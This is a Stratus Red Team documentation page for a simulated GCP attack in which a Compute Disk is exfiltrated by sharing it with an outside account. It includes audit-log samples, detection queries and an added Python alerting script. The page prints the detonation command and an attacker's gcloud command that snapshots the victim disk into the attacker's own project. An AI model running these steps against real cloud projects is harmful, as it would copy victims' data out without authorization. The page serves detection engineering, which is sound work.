
Exfiltrate Compute Disk by sharing it

idempotent

Platform: GCP

MITRE ATT&CK Tactics

  • Exfiltration

Description

Exfiltrates a Compute Disk by sharing it with a fictitious attacker account. The attacker can then create a snapshot of the disk from their own GCP project, copying its contents out of the victim project without ever being granted project-level access.

Warm-up:

  • Create a Compute Disk

Detonation:

  • Set the IAM policy of the disk so that the attacker account has permissions to read it (and therefore snapshot it) from their own project

Note

Since the target e-mail must exist for this attack simulation to work (GCP refuses to bind a role to a Google account that does not exist), Stratus Red Team grants the role to stratusredteam@gmail.com by default. This is a real Google account, owned by the Stratus Red Team maintainers and not used for any purpose other than this attack simulation. You can override this behavior by setting the environment variable STRATUS_RED_TEAM_ATTACKER_EMAIL, for instance:

export STRATUS_RED_TEAM_ATTACKER_EMAIL="your-own-gmail-account@gmail.com"
stratus detonate gcp.exfiltration.share-compute-disk

Instructions

Detonate with Stratus Red Team
stratus detonate gcp.exfiltration.share-compute-disk

Detection

You can detect when someone changes the IAM policy of a Compute Disk using the GCP Admin Activity audit log event whose methodName is v1.compute.disks.setIamPolicy. The request logs the full new policy, so the members being granted access are visible directly in the event. Here's a sample event, shortened for clarity:

{
  "protoPayload": {
    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
    "authenticationInfo": {
      "principalEmail": "user-sharing-the-disk@domain.tld",
      "principalSubject": "user:user-sharing-the-disk@domain.tld"
    },
    "requestMetadata": {
      "callerIp": "34.33.32.31",
      "callerSuppliedUserAgent": "google-cloud-sdk gcloud/..."
    },
    "resourceName": "projects/victim-project/zones/us-central1-a/disks/stratus-red-team-victim-disk",
    "request": {
      "policy": {
        "version": "3",
        "bindings": [
          {
            "role": "roles/owner",
            "members": [
              "user:attacker@gmail.com"
            ]
          }
        ]
      },
      "@type": "type.googleapis.com/compute.disks.setIamPolicy"
    }
  }
}

After the attacker has permissions on the Compute Disk, they can create a snapshot of it in their own GCP project using:

gcloud compute snapshots create stolen-snapshot \
    --source-disk https://www.googleapis.com/compute/v1/projects/victim-project/zones/us-central1-a/disks/stratus-red-team-victim-disk

When they do so, a GCP Admin Activity event v1.compute.snapshots.insert is generated in the victim project (the project that owns the source disk), even though the resulting snapshot lives in the attacker's project. This event indicates that the disk was not only shared but that data was actually copied out of it. Note that the principal is the attacker account, and that the entry carries the metadata type CrossEntityControlAuditMetadata, which marks the request as coming from outside the target resource's project (sample event shortened below):

{
  "protoPayload": {
    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
    "authenticationInfo": {
      "principalEmail": "attacker@gmail.com",
      "principalSubject": "user:attacker@gmail.com"
    },
    "requestMetadata": {
      "callerSuppliedUserAgent": "google-cloud-sdk gcloud/...",
      // Note: the IP of the attacker is not logged in this event
    },
    "serviceName": "compute.googleapis.com",
    "methodName": "v1.compute.snapshots.insert",
    "resourceName": "projects/victim-project/zones/us-central1-a/disks/stratus-red-team-victim-disk",
    "request": {
      "@type": "type.googleapis.com/compute.snapshots.insert"
    },
    "metadata": {
      "@type": "type.googleapis.com/google.cloud.audit.CrossEntityControlAuditMetadata"
    }
  }
}

Based on these events, detection strategies may include:

  • Alerting when the IAM policy of a Compute Disk is changed, especially if such a sharing mechanism is not part of your normal operations. Since the event carries the full new policy, you can inspect the members it grants access to and raise severity when any of them is outside your organization's domain (or is allUsers / allAuthenticatedUsers). Sample GCP Logs Explorer query:
protoPayload.methodName="v1.compute.disks.setIamPolicy"
  • Alerting when someone with an unexpected e-mail domain creates a snapshot of a Compute Disk. Because the snapshots.insert event is written to the victim project, the victim's own logs are sufficient for this. Sample GCP Logs Explorer query:
protoPayload.methodName="v1.compute.snapshots.insert"
NOT protoPayload.authenticationInfo.principalEmail=~".+@your-domain.tld$"
Service accounts that legitimately create snapshots (for example, backup tooling) use a *.iam.gserviceaccount.com address and would also match this query, so extend the exclusion to the service-account domains you expect.
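The two Logs Explorer queries above can be reproduced as detection logic that runs over exported audit-log entries, which also makes it possible to correlate them: a snapshot created by an external principal on a disk that was just shared with that same principal is the complete chain described on this page. The following is an added example, not part of Stratus Red Team or of the original page. The three sample events are constructed from the shortened entries shown above (not real log data), and the trusted domains your-domain.tld and victim-project.iam.gserviceaccount.com are assumptions standing in for your own organization's user and service-account domains.

```python
from typing import Any

PUBLIC_PRINCIPALS = {"allUsers", "allAuthenticatedUsers"}
DISK_SET_IAM = "v1.compute.disks.setIamPolicy"
SNAPSHOT_INSERT = "v1.compute.snapshots.insert"

# Constructed sample entries, modelled on the shortened events above (not real log data).
SET_IAM_POLICY_EVENT: dict[str, Any] = {
    "protoPayload": {
        "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
        "authenticationInfo": {"principalEmail": "user-sharing-the-disk@your-domain.tld"},
        "requestMetadata": {"callerIp": "34.33.32.31"},
        "methodName": DISK_SET_IAM,
        "resourceName": "projects/victim-project/zones/us-central1-a/disks/stratus-red-team-victim-disk",
        "request": {
            "@type": "type.googleapis.com/compute.disks.setIamPolicy",
            "policy": {
                "version": "3",
                "bindings": [
                    {"role": "roles/owner", "members": ["user:attacker@gmail.com"]},
                    {"role": "roles/compute.viewer", "members": ["group:sre@your-domain.tld"]},
                ],
            },
        },
    }
}
ATTACKER_SNAPSHOT_EVENT: dict[str, Any] = {
    "protoPayload": {
        "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
        "authenticationInfo": {"principalEmail": "attacker@gmail.com"},
        "serviceName": "compute.googleapis.com",
        "methodName": SNAPSHOT_INSERT,
        "resourceName": "projects/victim-project/zones/us-central1-a/disks/stratus-red-team-victim-disk",
        "metadata": {"@type": "type.googleapis.com/google.cloud.audit.CrossEntityControlAuditMetadata"},
    }
}
# A legitimate backup service account snapshotting another disk (assumed identity).
BENIGN_SNAPSHOT_EVENT: dict[str, Any] = {
    "protoPayload": {
        "authenticationInfo": {"principalEmail": "backup-sa@victim-project.iam.gserviceaccount.com"},
        "methodName": SNAPSHOT_INSERT,
        "resourceName": "projects/victim-project/zones/us-central1-a/disks/app-data",
    }
}


def is_trusted_identity(identity: str, trusted_domains: tuple[str, ...]) -> bool:
    """True when an e-mail-style identity belongs to one of the expected domains."""
    ident = identity.lower()
    return any(ident.endswith("@" + d.lower()) for d in trusted_domains)


def external_members(policy: dict[str, Any], trusted_domains: tuple[str, ...]) -> list[str]:
    """Members of an IAM policy that are not identities under a trusted domain.

    Public principals are always external; `domain:` members are external unless the
    domain itself is trusted; `deleted:` members are skipped since they cannot authenticate.
    Anything without an e-mail form (e.g. principal:// workload identities) is flagged.
    """
    external: list[str] = []
    trusted_lower = {d.lower() for d in trusted_domains}
    for binding in policy.get("bindings", []):
        for member in binding.get("members", []):
            if member in PUBLIC_PRINCIPALS:
                external.append(member)
                continue
            kind, _, ident = member.partition(":")
            if kind == "deleted":
                continue
            if kind == "domain":
                if ident.lower() not in trusted_lower:
                    external.append(member)
            elif not is_trusted_identity(ident, trusted_domains):
                external.append(member)
    return external


def detect(events: list[dict[str, Any]], trusted_domains: tuple[str, ...]) -> list[dict[str, Any]]:
    """Run both detections over audit-log entries (oldest first) and correlate them."""
    alerts: list[dict[str, Any]] = []
    granted: dict[str, set[str]] = {}  # disk resourceName -> external members granted on it
    for event in events:
        pp = event.get("protoPayload", {})
        method = pp.get("methodName", "")
        principal = pp.get("authenticationInfo", {}).get("principalEmail", "")
        resource = pp.get("resourceName", "")
        if method == DISK_SET_IAM:
            ext = external_members(pp.get("request", {}).get("policy", {}), trusted_domains)
            granted.setdefault(resource, set()).update(ext)
            alerts.append({
                "rule": "compute-disk-iam-policy-changed",
                "severity": "high" if ext else "low",
                "principal": principal,
                "resource": resource,
                "external_members": ext,
            })
        elif method == SNAPSHOT_INSERT and not is_trusted_identity(principal, trusted_domains):
            alerts.append({
                "rule": "snapshot-by-external-principal",
                "severity": "critical",
                "principal": principal,
                "resource": resource,
                # True when this same disk was earlier shared with exactly this principal.
                "chained_to_policy_change": f"user:{principal}" in granted.get(resource, set()),
            })
    return alerts


if __name__ == "__main__":
    trusted = ("your-domain.tld", "victim-project.iam.gserviceaccount.com")
    for alert in detect([SET_IAM_POLICY_EVENT, ATTACKER_SNAPSHOT_EVENT, BENIGN_SNAPSHOT_EVENT], trusted):
        print(alert)
```

Feeding the three sample events through detect() yields two alerts: a high-severity policy-change alert listing user:attacker@gmail.com as the only external member (the group binding under the trusted domain is ignored), and a critical snapshot alert for attacker@gmail.com marked as chained to that policy change. The backup service account produces nothing only because its *.iam.gserviceaccount.com domain is in the trusted tuple; with just the user domain trusted, it would fire too, which is the false-positive source the second Logs Explorer query shares.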